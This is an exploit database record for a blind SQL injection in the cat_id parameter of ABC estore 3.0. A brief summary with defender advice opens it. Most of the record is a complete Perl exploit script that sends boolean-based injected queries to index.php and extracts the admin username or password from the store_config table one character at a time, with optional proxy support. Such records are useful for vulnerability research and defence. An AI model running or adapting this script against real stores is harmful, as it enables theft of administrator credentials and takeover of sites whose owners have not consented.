Description
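ABC estore 3.0 - cat_id Blind SQL Injection
Summary: per the advisory text in the record below, the cat_id parameter of index.php accepts injected SQL. The included proof of concept is boolean-based: it appends a condition to cat_id and checks whether the response still contains the string "Subcategories". It uses that difference to read the user or pass column of the admin table (default name store_config) one character at a time. For defenders: handle cat_id strictly as an integer (cast it or bind it as a query parameter), and review web logs for index.php requests whose cat_id value contains SQL keywords such as SELECT, SUBSTRING or CHAR.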
{"lastseen": "2020-04-01T19:03:59", "references": [], "description": "\nABC estore 3.0 - cat_id Blind SQL Injection", "edition": 1, "reporter": "k1tk4t", "exploitpack": {"type": "webapps", "platform": "php"}, "published": "2007-08-29T00:00:00", "title": "ABC estore 3.0 - cat_id Blind SQL Injection", "type": "exploitpack", "enchantments": {"dependencies": {}, "score": {"value": 0.4, "vector": "NONE"}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.4}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2007-08-29T00:00:00", "id": "EXPLOITPACK:7E9817C743F4E94F4814CCBD17069287", "href": "", "viewCount": 4, "sourceData": "#!/usr/bin/perl\nuse LWP::UserAgent;\nuse Getopt::Long;\n\nif(!$ARGV[1])\n{\n print \"\\n |-------------------------------------------------|\";\n print \"\\n | newhack[dot]org |\";\n print \"\\n |-------------------------------------------------|\";\n print \"\\n | ABC estore 3.0 (cat_id) Blind SQL Injection |\";\n print \"\\n | Found by k1tk4t [k1tk4t(at)newhack.org] |\";\n print \"\\n | DNX Code [dnx(at)hackermail.com] | Modified |\";\n print \"\\n |-------------------------------------------------|\";\n print \"\\n[!] Vendor: http://www.webtoolup.com/\";\n print \"\\n[!] Bug: in the index.php script, u can inject sql code in the (cat_id) parameter\";\n print \"\\n[!] Need Subcategories Product for success exploit\";\n print \"\\n[!] Usage: perl abcestore.pl [Host] [Path] <Options>\";\n print \"\\n[!] Example: perl abcestore.pl 127.0.0.1 /shop/ -c 10 -o 1 -t store_config\";\n print \"\\n[!] 
Options:\";\n print \"\\n -c [no] Valid cat_id products with subcategories, default is 1\";\n print \"\\n -o [no] 1 = get username (default)\";\n print \"\\n 2 = get password\";\n print \"\\n -t [name] Changes the admin table name, default is store_config\";\n print \"\\n -p [ip:port] Proxy support\";\n print \"\\n\";\n exit;\n}\n\nmy $host = $ARGV[0];\nmy $path = $ARGV[1];\nmy $cat = 1;\nmy $column = \"user\";\nmy $table = \"store_config\";\nmy %options = ();\nGetOptions(\\%options, \"c=i\", \"o=i\", \"t=s\", \"p=s\");\n\nprint \"[!] Exploiting...\\n\";\n\nif($options{\"c\"}) { $cat = $options{\"c\"}; }\nif($options{\"o\"} && $options{\"o\"} == 2) { $column = \"pass\"; }\nif($options{\"t\"}) { $table = $options{\"t\"}; }\n\nsyswrite(STDOUT, \"[!] Data : \", 12);\n\nfor(my $i = 1; $i <= 32; $i++)\n{\n my $found = 0;\n my $h = 48;\n while(!$found && $h <= 57)\n {\n if(istrue2($host, $path, $table, $i, $h))\n {\n $found = 1;\n syswrite(STDOUT, chr($h), 1);\n }\n $h++;\n }\n if(!$found)\n {\n $h = 97;\n while(!$found && $h <= 122)\n {\n if(istrue2($host, $path, $table, $i, $h))\n {\n $found = 1;\n syswrite(STDOUT, chr($h), 1);\n }\n $h++;\n }\n }\n}\n\nprint \"\\n[!] 
Exploit done\\n\";\n\nsub istrue2\n{\n my $host = shift;\n my $path = shift;\n my $table = shift;\n my $i = shift;\n my $h = shift;\n\n my $ua = LWP::UserAgent->new;\n my $url = \"http://\".$host.$path.\"index.php?cat_id=\".$cat.\"%20AND%20SUBSTRING((SELECT%20\".$column.\"%20FROM%20\".$table.\"%20LIMIT%200,1),\".$i.\",1)=CHAR(\".$h.\")\";\n\n if($options{\"p\"})\n {\n $ua->proxy('http', \"http://\".$options{\"p\"});\n }\n\n my $response = $ua->get($url);\n my $content = $response->content;\n my $regexp = \"Subcategories\";\n\n if($content =~ /$regexp/)\n {\n return 1;\n }\n else\n {\n return 0;\n }\n}\n\n# milw0rm.com [2007-08-29]", "cvss": {"score": 0.0, "vector": "NONE"}, "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645592153, "score": 1659814272}, "_internal": {"score_hash": "158dfb8c4b0f1f27b6769f2718a444f6"}}
{}